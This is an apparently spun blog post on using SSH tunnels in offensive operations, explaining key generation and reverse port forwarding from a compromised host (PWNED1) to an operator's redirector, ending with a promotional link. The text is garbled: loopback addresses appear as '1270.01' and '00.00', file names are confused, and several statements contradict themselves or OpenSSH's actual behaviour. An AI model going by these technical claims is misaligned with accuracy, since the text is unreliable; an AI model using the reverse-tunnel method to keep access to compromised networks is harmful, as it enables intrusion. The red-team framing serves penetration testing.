Notes

Guide on SSH Tunnels and Proxies for Offense.
Getting Started with Secure Shell (SSH)
An SSH connection allows a user to connect remotely to a host and typically provides the user with an interactive shell or command prompt through which they can execute commands. Both Windows and Linux deploy SSH servers, and both have a built-in SSH client. In this post, we refer to all references made by OpenSSH, the most common SSH client / server implementation.
Firewall
A SSH server must always include firewall rules that whitelist connections from a particular host since SSH enables remote control of hosts. SSH servers that are accessible over the internet are especially vulnerable. Compromised infrastructure could be valuable to adversaries; giving them access would be a big failure.
Affirmation
With SSH, credentials can only be user and password. Furthermore, SSH lets users create public and private keys to replace passwords. They offer strong asymmetric encryption that is configurable. Access to the private key generated by the user should be protected as a secret. A public key is generated and added to the target host's authorized keys file.
Similarly to a password, if a private key is recovered by a hacker, he or she could access the server. Due to this, SSH keys should be encrypted with a password that represents a second factor. With the ssh-keygen utility, you can create a 4096-bit RSA key pair that includes the following:
The following command will be executed: ssh-keygen -t rsa -b 4096
Typically, id rsa.pub will contain the public key and the private key id rsa.pub. To encrypt Online SSH Client , enter a password. The user must be able to read only the private key file, and no one else can. An SSH client will ignore an identity file if it can read it due to file permissions. Normally it is best to set the permissions to 600 on Linux hosts so that a user can read and write the file, but other users and groups are not allowed to access.
We will analyze the commands in sections of this post, and also breakdown the commands into smaller parts so as to increase understanding. A visual image is displayed after each set of commands to describe network connectivity and identify the host that commands should be directed towards. LINUX1 represents a Linux workstation used by an operator, and REDIR1 a network connected host that is part of the offensive operations infrastructure.
The following image illustrates how to use a SSH private key to connect to the server REDIR1 using the rastley user from LINUX1:


SSH on LINUX1 with the SSH client
Put the identity file and the private key under / root / priv.key
Connect to REDIR1 through SSH and log in as rastley
In the image below, you can see how to establish a SSH connection from LINUX1 to REDIR1

Private key and SSH
Forward Tunnel for Remote Port
Connect to a compromised host in the client network with a redirector
Imagine that an operator compromises a host called PWNED1 running an SSH server during a breach assessment. In order to access the compromised host, the operator wishes to connect directly via SSH to the internet. Create a remote port forward SSH tunnel, aka a reverse tunnel, which connects PWNED1 to the operator's internet access server REDIR1. REDIR1 Once the tunnel is setup, it is possible to log in directly to the compromised host.
SSH client -R should be used to build a Remote port forward tunnel. An argument to this flag is [bind address:]port:host:hostport. Bind addresses are IP addresses over which tunnels should listen for the remote host. Bind addresses must not be confused with SSH server addresses that SSH clients connect to for authentication. OpenSSH defaults to using the hosts loopback adapter IP address, 1270.01. SSH servers / etc / ssh / sshd configuration files must enable GatewayPorts for connecting via a different IP address. This option binds to ALL interfaces if the bind address is empty, 00.00, or *. The problem is that this allows anyone with an IP address from the internet to connect to tunnel because it would listen on an interface with a public IP address and reach the internal compromised host. By default, GatewayPorts is not selected, and the address must be blank for the tunnel to bind. Thus, operators should always explicitly specify the bind address in contrast to assuming SSH server configuration.
By default, localhost refers to the hosts loopback adapter, however it can also be any IP address as long as the computers / etc / hosts file is modified. This is the reason it is required that users always use the interface IP address 1270.01. instead of a DNS name which resolves to the loopback adapter.
The port argument specifies the port that will be used to bind the tunnel to the Internet bind address interface of the remote server. Any port less than 1024 must be free, and the user account must have adequate permissions to bind to a privileged port
An argument to the host argument specifies the interface on the source host in which the command is executed and the connection is taken. It is best to explicitly specify 1270.01 as the loopback adapter as before.

My Website: https://shellngn.com